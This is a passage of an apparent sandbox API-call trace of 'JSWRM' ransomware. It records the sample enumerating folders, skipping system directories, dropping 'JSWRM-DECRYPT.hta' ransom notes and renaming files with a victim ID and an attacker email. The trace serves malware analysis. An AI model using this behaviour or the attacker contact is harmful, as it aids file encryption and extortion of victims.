ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="VSTO", cAlternateFileName="")) returned 0 [0068.998] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0068.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0068.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0068.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0068.999] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="Services", cAlternateFileName="")) returned 1 [0068.999] lstrcmpiW (lpString1="Services", lpString2=".") returned 1 [0068.999] lstrcmpiW (lpString1="Services", lpString2="..") returned 1 [0068.999] lstrcmpiW (lpString1="Services", lpString2="...") returned 1 [0068.999] lstrcmpiW (lpString1="Services", lpString2="windows") returned -1 [0068.999] lstrcmpiW (lpString1="Services", lpString2="recovery") returned 1 [0068.999] lstrcmpiW (lpString1="Services", lpString2="perflogs") returned 1 [0068.999] lstrcmpiW (lpString1="Services", lpString2="documents and settings") returned 1 [0069.000] lstrcmpiW (lpString1="Services", lpString2="$RECYCLE.BIN") returned 1 [0069.000] lstrcmpiW (lpString1="Services", lpString2="system volume information") returned -1 [0069.000] lstrcmpiW (lpString1="Services", lpString2="msocache") returned 1 [0069.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0069.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0069.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\services\\jswrm-decrypt.hta")) returned 0xffffffff [0069.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0069.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0069.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0069.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\services\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0069.001] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.001] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0069.102] CloseHandle (hObject=0x3d4) returned 1 [0069.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0069.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0069.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0069.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0069.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0069.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\services\\jswrm-decrypt.hta")) returned 0x20 [0069.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0069.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.103] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fc8fa28, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0069.103] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.103] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fc8fa28, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="..", cAlternateFileName="")) returned 1 [0069.103] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.103] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.103] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc8fa28, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fc8fa28, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fd9c6ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.104] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440ad34a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440ad34a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440ad34a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2=".") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="..") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="...") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="windows") returned -1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="recovery") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="perflogs") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="documents and settings") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="$RECYCLE.BIN") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="system volume information") returned 1 [0069.104] lstrcmpiW (lpString1="verisign.bmp", lpString2="msocache") returned 1 [0069.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verisign.bmp", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verisign.bmp", cchWideChar=12, lpMultiByteStr=0x345f2a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verisign.bmp", lpUsedDefaultChar=0x0) returned 12 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verisign.bmp", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verisign.bmp", cchWideChar=12, lpMultiByteStr=0x345f278, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verisign.bmp", lpUsedDefaultChar=0x0) returned 12 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.105] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9171748043920928) returned 0 [0069.105] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0069.105] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0, lpNumberOfBytesRead=0x345ef6c*=0x0, lpOverlapped=0x0) returned 0 [0069.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.105] CloseHandle (hObject=0xffffffff) returned 1 [0069.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0069.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0069.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0069.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.106] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), lpNewFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0069.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.107] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440ad34a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440ad34a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440ad34a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0069.107] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0069.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0069.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0069.109] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="System", cAlternateFileName="")) returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2=".") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="..") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="...") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="windows") returned -1 [0069.109] lstrcmpiW (lpString1="System", lpString2="recovery") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="perflogs") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="documents and settings") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="$RECYCLE.BIN") returned 1 [0069.109] lstrcmpiW (lpString1="System", lpString2="system volume information") returned -1 [0069.109] lstrcmpiW (lpString1="System", lpString2="msocache") returned 1 [0069.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0069.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0069.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0069.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0069.109] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\jswrm-decrypt.hta")) returned 0xffffffff [0069.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0069.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0069.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0069.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0069.113] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.113] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0069.114] CloseHandle (hObject=0x3d4) returned 1 [0069.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0069.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0069.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0069.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0069.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0069.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\jswrm-decrypt.hta")) returned 0x20 [0069.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0069.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.115] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, 